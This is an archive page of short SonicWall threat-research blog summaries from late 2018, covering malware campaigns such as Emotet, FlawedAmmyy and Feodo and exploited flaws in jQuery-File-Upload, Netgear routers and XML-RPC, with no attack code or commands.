A widely used jQuery plugin, ‘jQuery-File-Upload’, also called Blueimp contains a critical vulnerability that allows attackers to perform remote code execution. This vulnerability has been in existence for several years and potentially places 7,800 web application forked from this project at risk. Hackers have been actively exploiting this vulnerability but was disclosed only recently. SonicWall…Learn More
Month: October 2018
FlawedAmmyy RAT delivered through fake invoice emails in large numbers (October 20, 2018)
SonicWall Threat Research Lab has observed a phishing email campaign sending fake invoice emails in large numbers. Email messages and the documents have been crafted using social engineering tricks to lure recipients into opening the attached files and enabling macros. FlawedAmmyy RAT seems to be the final payload. Figure 1: Infection chain of the phishing campaign On…Learn More
Panini Adware for Android soaks network bandwidth, bad news for users with limited data (October 18, 2018)
Android adware campaign – Panini – consumes network data at a high rate once it begins execution…Learn More
Trojan uses EternalBlue to install cryptominer (October 13, 2018)
Interest in cryptocurrencies has not wavered despite a period of sinking market values. Cybercriminals are still ramping up efforts to obtain Blockchain assets in the hopes that their values could spike back up again in the future. While ransomware is still around, we have observed that cryptocurrency mining is increasingly being favored by cybercriminals as…Learn More
Emotet Malware spreading via IRS theme based spam email (October 9, 2018)
SonicWall RTDMI engine detected an archive attachment consisting of malicious word documents inside of spam email appearing to be from the IRS department…Learn More
Massive IOT attack targeting unpatched Netgear devices (October 6, 2018)
SonicWall Threat Research Lab has recently spotted a massive IOT attack, attempting to exploit a remote code execution vulnerability in Netgear DGN series routers. It seems to have started over the weekend and the detection rate has been spiking for the last few days. We observed over 100,000 attacks coming from different IP addresses to exploit ~7000…Learn More
Most exploited vulnerabilities in this month (September 29, 2018)
SonicWall Threat Research Lab has observed the vulnerabilities that are actively being exploited from the beginning of this month. Please find below the list of vulnerabilities, vendor advisory information and the SonicWall signatures to protect against these exploits CVE-2017-11882 | Microsoft Office EQNEDT32 Stack Buffer Overflow This is a stack buffer overflow vulnerability in Microsoft Office…Learn More
Vigilante malware removes cryptominers from the infected device (September 22, 2018)
A malware that seeks and removes cryptominers from an infected device…Learn More
Major attempt to exploit XML-RPC remote code injection vulnerability is observed (September 22, 2018)
SonicWall Threat Research Lab has recently observed a huge spike in detection for the XML-RPC remote code injection. There are 3000+ hits in the last two days attempting to exploit 100+ web servers behind the SonicWall Firewalls. All these attacks are coming from one IP address 96.68.165.185 targeting servers in different countries. XML-RPC? XML-RPC is…Learn More
Active spam campaign spreading Feodo banking trojan spotted (September 15, 2018)
The SonicWall Capture Labs Threat Research team has been observing an active spam campaign spreading a banking Trojan widely known as Feodo. This spam uses a very common tactic of sending a fake invoice or bank statement as an attachment with a link that leads to downloading malware.   Infection cycle: The spam email purports…Learn More